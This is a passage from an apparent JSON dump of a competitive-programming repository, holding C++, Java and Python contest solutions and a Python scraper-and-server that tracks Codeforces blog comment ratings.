'\\n' : ' ');\n}\n\nint main()\n{\n// freopen(\"input.txt\", \"r\", stdin);\n a.resize(6);\n while (true)\n {\n int c = 0;\n int s = 0;\n for (int i = 0; i < 6; i++)\n scanf(\"%d\", &a[i]),\n a[i] == 0 ? c++ : c += 0;\n if (c == 6)\n break;\n for (int i = 0; i < 6; i += 2)\n if (a[i] > a[i + 1])\n swap(a[i], a[i + 1]);\n int mx = -1, j;\n for (int i = 0; i < 6; i += 2)\n if (a[i] > mx)\n mx = a[i],\n j = i;\n s = s + a[j] * a[j + 1];\n swap(a[j], a[0]);\n swap(a[j + 1], a[1]);\n s = s + a[2] * a[3];\n s = s + a[4] * a[5];\n if (a[2] < a[4])\n swap(a[2], a[4]),\n swap(a[3], a[5]);\n //printf(\"%I64d\\n\", s);\n\n s = s - min(a[0], a[2]) * min(a[1], a[3]);\n s = s - max(min(a[0], a[4]) * min(a[1], a[5])\n ,min(a[4], a[2]) * min(a[3], a[5]));\n printf(\"%d\\n\", s);\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.5566926002502441, "alphanum_fraction": 0.5658002495765686, "avg_line_length": 30.727272033691406, "blob_id": "6aa9bef14b61f341f2369e3e0789b77135dc08f2", "content_id": "3fe2f72cdbb37e036c4ebdfc6f10fba7d977060f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9885, "license_type": "no_license", "max_line_length": 117, "num_lines": 308, "path": "/CodeForce/codeforcesComments.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import requests\nimport threading\nfrom time import sleep\nfrom html.parser import HTMLParser\nimport multiprocessing\nfrom multiprocessing import Manager\nimport cherrypy_cors\nimport cherrypy\nimport json\nimport sys\n\nmanager = Manager()\ncomments = manager.dict()\nusers = manager.dict()\nblogs = manager.dict()\nusersToServer = manager.list()\ncommentsToServer = manager.list()\nblogsToServer = manager.list()\nSLEEP_RECENT = 60 * 30\nSLEEP_BIG_UPDATE = 3600 * 40\nCOUNT_COMMENTS_TO_WATCH = 50\nMIN_RATING_TO_WATCH = 100\nMIN_BLOG_TO_WATCH = 20\npath = '/home/igorjan/206round/CodeForce'\nport = 2929\nhost = \"192.168.2.6\"\n\n# {{{\nclass 
CodeForcesRecentActionsParser(HTMLParser):\n\n def __init__(self):\n HTMLParser.__init__(self)\n self.recentActions = False\n self.li = False\n self.recent = set()\n\n def handle_starttag(self, tag, attrs):\n if tag == 'div':\n if attrs == [('class', 'recent-actions')]:\n self.recentActions = True\n elif tag == 'li':\n self.li = True\n elif tag == 'a' and self.recentActions and self.li and len(attrs) == 1:\n (x, y) = attrs[0]\n self.recent.add(y.rsplit('/', 2)[-1])\n\n def handle_endtag(self, tag):\n if tag == 'div' and self.recentActions and not self.li:\n self.recentActions = False\n if tag == 'li' and self.recentActions:\n self.li = False\n\nclass CodeForcesBlogParser(HTMLParser):\n\n def __init__(self, blogId):\n HTMLParser.__init__(self)\n self.avatar = False\n self.user = ''\n self.blogId = blogId\n self.postRating = False\n self.author = ''\n self.getAuthor = False\n self.blogRating = 0\n\n def handle_starttag(self, tag, attrs):\n if tag == 'div':\n if attrs == [('class', 'avatar')]:\n self.avatar = True\n if attrs == [('class', 'right-meta')]:\n self.getAuthor = True\n if tag == 'a' and self.avatar:\n (_, self.user) = attrs[0]\n self.avatar = False\n if tag == 'a' and self.getAuthor:\n (_, self.author) = attrs[0]\n blogs[self.blogId] = (self.blogRating, self.author.rsplit('/', 2)[-1])\n self.getAuthor = False\n if tag == 'span':\n if len(attrs) >= 3:\n x, commentId = attrs[0]\n if x == 'commentid':\n index = 1\n if len(attrs) == 4:\n index += 1\n _, count = attrs[index]\n name = self.user.rsplit('/', 2)[-1]\n count = int(count)\n if abs(count) >= COUNT_COMMENTS_TO_WATCH: # HERE\n comments[commentId] = (name, int(count), self.blogId)\n if name in users:\n users[name] += count\n else:\n users[name] = count\n elif len(attrs) >= 2:\n x, title = attrs[0]\n if x == 'title' and title == \"Рейтинг текста\":\n self.postRating = True\n\n def handle_data(self, data):\n if self.postRating:\n self.blogRating = int(data)\n self.postRating = False\n# }}}\n\ndef 
proceedArray(x, **kwargs):\n if not 'from' in kwargs:\n fromIndex = 0\n else:\n fromIndex = int(kwargs['from'])\n if not 'count' in kwargs:\n toIndex = fromIndex + 10\n else:\n toIndex = fromIndex + int(kwargs['count'])\n if 'reversed' in kwargs:\n x2 = list(reversed(x))\n else:\n x2 = x\n if 'username' in kwargs:\n x2 = list(filter(lambda x: kwargs['username'] in x['username'], x2))\n length = len(x2)\n toIndex = min(toIndex, length)\n\n return json.dumps({'length': length, 'data': x2[fromIndex:toIndex]})\n\nclass CodeForcesServer(object):\n\n @cherrypy.expose\n def default(self, *args, **kwargs):\n try:\n x, y = args\n if x == 'js' or x == 'css' or x == 'tpl':\n return open(path + '/resources/' + x + '/' + y, 'r')\n if x == 'fonts':\n return open(path + '/resources/' + x + '/' + y, 'rb')\n return open(path + '/index.html', 'r')\n except:\n return open(path + '/index.html', 'r')\n\n @cherrypy.expose\n def comments(self, **kwargs):\n global commentsToServer\n return proceedArray(commentsToServer, **kwargs)\n\n @cherrypy.expose\n def blogs(self, **kwargs):\n global blogsToServer\n return proceedArray(blogsToServer, **kwargs)\n\n @cherrypy.expose\n def users(self, **kwargs):\n global usersToServer\n return proceedArray(usersToServer, **kwargs)\n\ndef updateRecentActions():\n print(\"updating recent actions\")\n url = 'http://codeforces.com/?locale=ru'\n parser = CodeForcesRecentActionsParser()\n data = requests.get(url)\n if data.status_code != 200:\n print(\"пицоооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооооот\")\n else:\n parser.feed(data.text)\n print(\"updated recent actions\")\n return parser.recent\n\ndef parseBlog(blogId):\n print(\"parsing blog\", blogId)\n url = 'http://codeforces.com/blog/entry/' + blogId + '?locale=ru'\n parser = CodeForcesBlogParser(blogId)\n response = requests.get(url)\n if len(response.history) == 0 and response.status_code == 200:\n parser.feed(response.text)\n else:\n if 
response.status_code != 200:\n print(response.status_code, \" in \", blogId)\n else:\n print(response.history, \" in \", blogId)\n print(\"parsed blog\", blogId)\n\ndef dumpFile(x, f):\n qwer = open(path + '/' + f + '.json', 'w')\n qwer.write(json.dumps(x))\n qwer.close()\n\n\ndef updateBlogsFromRecentActions():\n while True:\n print(\"update blogs thread\")\n global recentBlogs\n global pool\n global commentsToServer\n global usersToServer\n global blogsToServer\n pool.map(parseBlog, recentBlogs)\n recentBlogs = set()\n\n commentsToServer = []\n for u, (x, y, z) in comments.items():\n commentsToServer.append({'count': y, 'username': x, 'commentId': u, 'postId' : z})\n commentsToServer = list(reversed(sorted(commentsToServer, key=lambda x: x[\"count\"])))\n i = 0;\n for comment in commentsToServer:\n i += 1\n comment['id'] = i\n\n\n usersToServer = []\n for name, count in users.items():\n if abs(int(count)) > MIN_RATING_TO_WATCH: # HERE\n usersToServer.append({'username': name, 'count': count})\n usersToServer = list(reversed(sorted(usersToServer, key=lambda x: x[\"count\"])))\n i = 0;\n for comment in usersToServer:\n i += 1\n comment['id'] = i\n\n\n blogsToServer = []\n for blogId, (count, name) in blogs.items():\n if abs(int(count)) > MIN_BLOG_TO_WATCH: # HERE\n blogsToServer.append({'username': name, 'count': count, 'postId': blogId})\n blogsToServer = list(reversed(sorted(blogsToServer, key=lambda x: x[\"count\"])))\n i = 0;\n for comment in blogsToServer:\n i += 1\n comment['id'] = i\n\n\n print(\"updated blogs thread\")\n dumpFile(commentsToServer, 'comments')\n dumpFile(usersToServer, 'users')\n dumpFile(blogsToServer, 'blogs')\n print(\"saved into comments.json blogs thread\")\n sleep(SLEEP_BIG_UPDATE)\n\n\ndef recentActionsThread():\n while True:\n print(\"recent blogs thread\")\n sleep(SLEEP_RECENT)\n global recentBlogs\n recentBlogs = recentBlogs.union(updateRecentActions())\n\ndef main():\n global recentBlogs\n global pool\n global commentsToServer\n 
global usersToServer\n pool = multiprocessing.Pool()\n\n # recentBlogs = json.loads(open('comments.json', 'r').read())\n recentBlogs = set()\n try:\n qwer = open(path + '/comments.json', 'r')\n wert = qwer.readline()\n commentsToServer = json.loads(wert)\n for comment in commentsToServer:\n comments[comment['commentId']] = (comment['username'], comment['count'], comment['postId'])\n qwer.close()\n except:\n print(42)\n # recentBlogs = set(map(str, range(1, 25000)))\n recentBlogs = recentBlogs.union(updateRecentActions())\n\n try:\n qwer = open(path + '/blogs.json', 'r')\n wert = qwer.readline()\n blogsToServer = json.loads(wert)\n for blog in blogsToServer:\n blogs[blog['postId']] = (blog['count'], blog['username'])\n except:\n print(\"ok\")\n\n try:\n qwer = open(path + '/users.json', 'r')\n wert = qwer.readline()\n usersToServer = json.loads(wert)\n for user in usersToServer:\n users[user['username']] = user['count']\n except:\n print(\"ok\")\n download1 = threading.Thread(target=updateBlogsFromRecentActions)\n download2 = threading.Thread(target=recentActionsThread)\n download1.start()\n download2.start()\n\n conf = {\n '/': {\n 'tools.sessions.on': True,\n 'cors.expose.on': True,\n },\n '/generator': {\n 'request.dispatch': cherrypy.dispatch.MethodDispatcher(),\n 'tools.response_headers.on': True,\n 'tools.response_headers.headers': [('Content-Type', 'text/plain')],\n },\n }\n cherrypy_cors.install()\n webapp = CodeForcesServer()\n cherrypy.response.headers[\"Access-Control-Allow-Origin\"] = \"*\"\n cherrypy.config.update({'server.socket_port': port, 'server.socket_host': host})\n cherrypy.quickstart(webapp, '/', conf)\n download1.join()\n download2.join()\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.30927833914756775, "alphanum_fraction": 0.34364262223243713, "avg_line_length": 16.636363983154297, "blob_id": "f462735944574f037b9e76159354dad6e7c66073", "content_id": "873dd89ae486e64b16e9e09226d4d8e7262daa33", "detected_licenses": [], 
"is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 582, "license_type": "no_license", "max_line_length": 38, "num_lines": 33, "path": "/trash/test.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\n\nusing namespace std;\n\nvoid sort(int*);\n\nint main() {\n int a[12];\n int min; cin >> min;\n for (int i = 0; i < 12; i++)\n cin >> a[i];\n sort(a);\n int s = 0;\n int c = 0;\n while (s < min) {\n s += a[c++];\n }\n if (c > 12)\n c = -1;\n cout << c << endl;\n return 0;\n}\n\nvoid sort(int *a) {\n for (int i = 1; i < 12; i++) {\n for (int j = 0; j < 12-i; j++)\n if (a[j] < a[(j+1)]) {\n int temp = a[j];\n a[j] = a[(j+1)];\n a[(j+1)] = temp;\n }\n }\n}\n" }, { "alpha_fraction": 0.5652173757553101, "alphanum_fraction": 0.5652173757553101, "avg_line_length": 22, "blob_id": "c351e3b4da4133f3fa266113bafdab6caa62c1e8", "content_id": "df1ccdee31169f2856425fba8ac6c908ec04397a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 207, "license_type": "no_license", "max_line_length": 51, "num_lines": 9, "path": "/2020/back/D.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import json\n\nn, m = map(int, input().split())\ns = []\nfor i in range(n):\n s += json.loads(input())['offers']\n\ns.sort(key = lambda x: (x['price'], x['offer_id']))\nprint(json.dumps({'offers': list(s)[:m]}))\n" }, { "alpha_fraction": 0.4285714328289032, "alphanum_fraction": 0.4571428596973419, "avg_line_length": 16.399999618530273, "blob_id": "26d9494a499af727a1675775284b80f11371b7ad", "content_id": "d68a9a0c3aebe16a3957768974ba4a2f40eb4add", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 175, "license_type": "no_license", "max_line_length": 32, "num_lines": 10, "path": "/CodeForce/0589/I.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n, k = map(int, input().split())\na = [0] * k\nr = 
map(int, input().split())\nfor x in r:\n a[x - 1] += 1\nans = 0\nk = n // k\nfor x in a:\n ans += abs(x - k)\nprint(ans // 2)\n\n" }, { "alpha_fraction": 0.5147058963775635, "alphanum_fraction": 0.5211396813392639, "avg_line_length": 21.66666603088379, "blob_id": "db03509b56b4f5ce8e26f4c6d806ce9492843d84", "content_id": "88cfa112fe20db06000ba60886f6ff7a8e465004", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1088, "license_type": "no_license", "max_line_length": 85, "num_lines": 48, "path": "/2014/gcj2014_1B/B.hpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#ifndef SOLUTION_HPP\n#define SOLUTION_HPP\n\n#include <bits/stdc++.h>\n#include <QTextStream>\n#include <QDebug>\n#define enter printf(\"\\n\")\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n\nusing namespace std;\n\nstruct Solution\n{\n int a, b, k;\n ll ans = 0;\n\n void input(QTextStream &in)\n {\n in >> a >> b >> k;\n }\n\n void solve()\n {\n forn(i, k)\n forn(q, a)\n forn(w, b)\n if ((q & w) == i)\n ans++;\n }\n\n void output(QTextStream &out)\n {\n out << ans << \"\\n\";\n }\n};\n\n#endif // SOLUTION_HPP\n" }, { "alpha_fraction": 0.4075492322444916, "alphanum_fraction": 0.4133843779563904, "avg_line_length": 21.755186080932617, "blob_id": "2cce6e8ff8cd537c85fb7d8bd540aa9a678a272a", "content_id": "0db42f96f24164c5ef6889b5d565556872783994", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", 
"length_bytes": 5484, "license_type": "no_license", "max_line_length": 94, "num_lines": 241, "path": "/CodeForce/0924/D.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.*;\nimport java.util.*;\nimport java.math.BigInteger;\nimport java.util.Map.Entry;\n\nimport static java.lang.Math.*;\n\npublic class D extends PrintWriter {\n\n long gcd(long a, long b) {\n return b == 0 ? a : gcd(b, a % b);\n }\n\n class Q implements Comparable<Q> {\n final long n, d;\n\n @Override\n public String toString() {\n // return n + \"/\" + d;\n return String.format(Locale.ENGLISH, \"%.3f\", 1.0 * n / d);\n }\n\n public Q(long n, long d) {\n\n if (d < 0) {\n d *= -1;\n n *= -1;\n }\n\n long g = gcd(abs(n), abs(d));\n\n this.n = n / g;\n this.d = d / g;\n }\n\n @Override\n public int hashCode() {\n return ((int) (d ^ (d >>> 32))) * 31 + ((int) (n ^ (n >>> 32)));\n }\n\n @Override\n public boolean equals(Object obj) {\n if (this == obj)\n return true;\n if (obj == null)\n return false;\n return eq(this, (Q) obj);\n }\n\n @Override\n public int compareTo(Q q) {\n return Long.compare(n * q.d, d * q.n);\n }\n }\n\n boolean eq(Q a, Q b) {\n return (a.n == b.n) && (a.d == b.d);\n }\n\n void add(int[] ft, int i, int value) {\n for (; i < ft.length; i |= i + 1) {\n ft[i] += value;\n }\n }\n\n int sum(int[] ft, int i) {\n int res = 0;\n for (; i >= 0; i = (i & (i + 1)) - 1) {\n res += ft[i];\n }\n return res;\n }\n\n void run() {\n\n int n = nextInt();\n int w = nextInt();\n\n Q[] l = new Q[n];\n Q[] r = new Q[n];\n\n for (int i = 0; i < n; i++) {\n int x = nextInt();\n int v = nextInt();\n\n l[i] = new Q(x, v - w);\n r[i] = new Q(x, v + w);\n\n // println(l[i] + \" \" + r[i]);\n }\n\n int m = 0;\n\n Q[] c = r.clone();\n Arrays.sort(c);\n\n int[] v = new int[n];\n\n for (int i = 1; i < n; i++) {\n if (!eq(c[i - 1], c[i])) {\n ++m;\n }\n v[i] = m;\n }\n ++m;\n\n int[] ft = new int[m];\n\n int[] cr = new int[n];\n\n for (int i = 0; i < n; i++) {\n cr[i] = 
v[Arrays.binarySearch(c, r[i])];\n }\n\n for (int i = 0; i < n; i++) {\n add(ft, cr[i], +1);\n }\n\n long ans = 0;\n\n Integer[] order = new Integer[n];\n\n for (int i = 0; i < n; i++) {\n order[i] = i;\n }\n\n Arrays.sort(order, new Comparator<Integer>() {\n @Override\n public int compare(Integer i, Integer j) {\n int cmp = l[i].compareTo(l[j]);\n if (cmp == 0)\n return r[j].compareTo(r[i]);\n else\n return cmp;\n }\n });\n\n for (int i : order) {\n int t = cr[i];\n add(ft, t, -1);\n\n long s = sum(ft, t);\n\n // println(i + \" \" + s);\n\n ans += s;\n }\n\n println(ans);\n\n }\n\n boolean skip() {\n while (hasNext()) {\n next();\n }\n return true;\n }\n\n int[][] nextMatrix(int n, int m) {\n int[][] matrix = new int[n][m];\n for (int i = 0; i < n; i++)\n for (int j = 0; j < m; j++)\n matrix[i][j] = nextInt();\n return matrix;\n }\n\n String next() {\n while (!tokenizer.hasMoreTokens())\n tokenizer = new StringTokenizer(nextLine());\n return tokenizer.nextToken();\n }\n\n boolean hasNext() {\n while (!tokenizer.hasMoreTokens()) {\n String line = nextLine();\n if (line == null) {\n return false;\n }\n tokenizer = new StringTokenizer(line);\n }\n return true;\n }\n\n int[] nextArray(int n) {\n int[] array = new int[n];\n for (int i = 0; i < n; i++) {\n array[i] = nextInt();\n }\n return array;\n }\n\n int nextInt() {\n return Integer.parseInt(next());\n }\n\n long nextLong() {\n return Long.parseLong(next());\n }\n\n double nextDouble() {\n return Double.parseDouble(next());\n }\n\n String nextLine() {\n try {\n return reader.readLine();\n } catch (IOException err) {\n return null;\n }\n }\n\n public D(OutputStream outputStream) {\n super(outputStream);\n }\n\n static BufferedReader reader;\n static StringTokenizer tokenizer = new StringTokenizer(\"\");\n static Random rnd = new Random();\n static boolean OJ;\n\n public static void main(String[] args) throws IOException {\n OJ = System.getProperty(\"ONLINE_JUDGE\") != null;\n D solution = new D(System.out);\n if 
(OJ) {\n reader = new BufferedReader(new InputStreamReader(System.in));\n solution.run();\n } else {\n reader = new BufferedReader(new FileReader(new File(D.class.getName() + \".txt\")));\n long timeout = System.currentTimeMillis();\n while (solution.hasNext()) {\n solution.run();\n solution.println();\n solution.println(\"----------------------------------\");\n }\n solution.println(\"time: \" + (System.currentTimeMillis() - timeout));\n }\n solution.close();\n reader.close();\n }\n}\n" }, { "alpha_fraction": 0.37792640924453735, "alphanum_fraction": 0.3913043439388275, "avg_line_length": 26.18181800842285, "blob_id": "b061b918e897651ffedfc34b0e44b81e0d79b751", "content_id": "11abfc479528d6693d1cfcf715f51f51e3844939", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 299, "license_type": "no_license", "max_line_length": 98, "num_lines": 11, "path": "/trains/train2015western/F.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = int(input())\na = []\nfor i in range(n):\n a.append(input())\nok = True\nfor i in range(n):\n for j in range(n):\n if a[i][j] == '*':\n if a[n - i - 1][n - j - 1] == '*' or a[j][n - i - 1] == '*' or a[n - j - 1][i] == '*':\n ok = False\nprint('YES' if ok else 'NO')\n" }, { "alpha_fraction": 0.4423697590827942, "alphanum_fraction": 0.45573997497558594, "avg_line_length": 17.860870361328125, "blob_id": "565d530bdd65cc2c95911c4849fd0b95b03cc3bd", "content_id": "d68203ffe73bad0b91ee99c5a0bcc1b40d2fb0d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4338, "license_type": "no_license", "max_line_length": 163, "num_lines": 230, "path": "/CodeForce/0399/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\n#define enter printf(\"\\n\")\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define 
forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"input\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a);void writeln(int a, int b); void writeln(int a, int b, int c); void writeln(int a, int b, int c, int d); void writeln(vector<int>& a);\nvoid readln(int& a);void readln(int& a, int& b);void readln(int& a, int& b, int& c);void readln(int& a, int& b, int& c, int& d);void readln(vector<int>& a, int n);\n\nstruct graph\n{\n vector<vector<int>> edges;\n int n;\n graph(int n);\n graph(int n, int m);\n graph();\n void createGraph(int n);\n void add_edge(int u, int v);\n void add_or_edge(int u, int v);\n void writelnMatrix();\n void writeln();\n};\n\nint n, m, k;\nll N, M;\nvi a;\n\nll f(ll j)\n{\n ll q = m / (j + 2), w = m % (j + 2);\n return (ll) (N - j) * (N - j) + j - (ll) (q + 1) * (q + 1) * w - (ll) (q * q * (j + 2 - w));\n}\n\nvoid run()\n{\n readln(n, m);\n N = n, M = m;\n if (m == 0)\n {\n cout << N * N << endl;\n fori(n)\n printf(\"o\");\n return;\n }\n if (n == 0)\n {\n cout << -M * M << endl;\n fori(m)\n printf(\"x\");\n return;\n }\n ll ans = -10000000000000ll;\n int z = -1;\n for(ll i = 0; i < N; i++)\n {\n ll temp = f(i);\n if (ans < temp)\n ans = temp,\n z = i;\n }\n// writeln(z);\n cout << ans << endl;\n int te = 0;\n fori(z + 1)\n {\n int t = m/(z+2) + (bool)(i < m%(z+2));\n te += t;\n forj(t)\n printf(\"x\");\n if (i==0)\n forj(n-z)\n printf(\"o\");\n else\n printf(\"o\");\n }\n forj(m - te)\n printf(\"x\");\n}\n\nint main()\n{\n /*freopen(FILEINPUT.append(\".out\").c_str(), \"r\", stdin);\n string s;\n cin >> s;\n cin >> 
s;\n cin >> s;\n ll q = 0;\n ll i = 1, j = 0;\n while (i < s.size())\n {\n while (s[i] == s[i - 1])\n i++;\n q += (ll)(i - j) * (i - j) * (s[i - 1] == 'o' ? 1 : -1);\n j = i++;\n }\n cout << q << endl;*/\n //freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n\ngraph::graph(int n)\n{\n this->n = n;\n edges.resize(n);\n int t;\n fori(n)\n {\n edges[i].resize(n);\n forj(n)\n readln(t),\n edges[i][j] = t == '1';\n }\n}\n\ngraph::graph(int n, int m)\n{\n this->n = n;\n edges.resize(n);\n int u, v;\n fori(m)\n readln(u, v),\n add_edge(u - 1, v - 1);\n}\n\nvoid graph::add_edge(int u, int v)\n{\n edges[u].pb(v);\n}\n\nvoid graph::add_or_edge(int u, int v)\n{\n edges[u].pb(v);\n edges[v].pb(u);\n}\n\ngraph::graph(){};\n\nvoid graph::createGraph(int n)\n{\n edges.resize(n);\n}\n\nvoid graph::writeln()\n{\n fori(n)\n forj(edges[i].size())\n ::writeln(i, edges[i][j]);\n}\n\nvoid graph::writelnMatrix()\n{\n fori(n)\n {\n forj(n)\n printf(\"%d \", edges[i][j]);\n printf(\"\\n\");\n }\n}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n readln(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? 
'\\n' : ' ');\n}\n\nvoid writeln(int a)\n{\n printf(\"%d\\n\", a);\n}\n\nvoid writeln(int a, int b)\n{\n printf(\"%d %d\\n\", a, b);\n}\n\nvoid writeln(int a, int b, int c)\n{\n printf(\"%d %d %d\\n\", a, b, c);\n}\n\nvoid writeln(int a, int b, int c, int d)\n{\n printf(\"%d %d %d %d\\n\", a, b, c, d);\n}\n\nvoid readln(int &a)\n{\n scanf(\"%d\", &a);\n}\n\nvoid readln(int &a, int &b)\n{\n scanf(\"%d %d\", &a, &b);\n}\n\nvoid readln(int &a, int &b, int &c)\n{\n scanf(\"%d %d %d\", &a, &b, &c);\n}\n\nvoid readln(int &a, int &b, int &c, int &d)\n{\n scanf(\"%d %d %d %d\", &a, &b, &c, &d);\n}\n" }, { "alpha_fraction": 0.48558101058006287, "alphanum_fraction": 0.5029686093330383, "avg_line_length": 27.239521026611328, "blob_id": "e70a54620f20fea1b90235023928478566d6a9a7", "content_id": "6b9a0517c28e09eba8941c0d4531ddcb35164cb8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4716, "license_type": "no_license", "max_line_length": 174, "num_lines": 167, "path": "/CodeForce/1497/E1.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) 
int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//linearSieve\nstruct linearSieve\n{\n vector<int> primes;\n vector<int> minPrime, prev;\n\n linearSieve(int N)\n {\n minPrime.resize(N, 0);\n prev.resize(N, 0);\n for (int i = 2; i < N; i++)\n {\n if (minPrime[i] == 0)\n primes.push_back(i),\n minPrime[i] = i;\n for (int prime : primes)\n {\n int temp = prime * i;\n if (temp < N && prime <= minPrime[i])\n minPrime[temp] = prime,\n prev[temp] = i;\n else\n break;\n }\n }\n }\n\n vector<pair<int, int>> foldedFactorization(int x)\n {\n vector<pair<int, int>> temp;\n int p = -1;\n int pp = -1;\n while (x > 1)\n {\n pp = p;\n p = minPrime[x];\n if (p != pp)\n temp.pb({p, 1});\n else\n temp.back().second++;\n x = prev[x];\n }\n return temp;\n }\n\n vector<int> divisors(int x, bool nonTrivial = true)\n {\n vector<int> ans;\n\n const vector<pair<int, int>>& fold = foldedFactorization(x);\n function<void(int, int)> gen = [&](int v, int j) {\n if (j == int(fold.size()))\n {\n if (!nonTrivial || (v != 1 && v != x))\n ans.pb(v);\n return;\n }\n gen(v, j + 1);\n fori(fold[j].second)\n gen(v *= fold[j].first, j + 1);\n };\n gen(1, 0);\n\n return ans;\n }\n\n vector<int> sortedDivisors(int x, bool nonTrivial = true)\n {\n vector<int> ans = divisors(x, nonTrivial);\n sort(ans.begin(), ans.end());\n return ans;\n }\n\n vector<int> factorization(int x)\n {\n vector<int> temp;\n while (x > 1)\n temp.push_back(minPrime[x]),\n x = prev[x];\n return temp;\n }\n\n bool isPrime(int x)\n {\n return minPrime[x] == x;\n 
}\n};\n\n//}}}\n\nlinearSieve s(10000001);\n\nvoid run()\n{\n ints(n, k);\n vi a(n);\n readln(a);\n set<int> cur;\n int ans = 0;\n for (int& x: a)\n {\n auto f = s.foldedFactorization(x);\n int temp = 1;\n for (auto& [k, v]: f)\n if (v % 2)\n temp *= k;\n if (cur.find(temp) != cur.end())\n ans++,\n cur = set<int>();\n cur.insert(temp);\n }\n writeln(ans + 1);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n ints(t); fori(t) run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.417827308177948, "alphanum_fraction": 0.4261838495731354, "avg_line_length": 20.75757598876953, "blob_id": "642fe20bec841134a498023c2f55b5bd706a2952", "content_id": "8781a2d568296cb08afb237d658d3722105365a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 718, "license_type": "no_license", "max_line_length": 50, "num_lines": 33, "path": "/TopCoder/TCO/300.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include 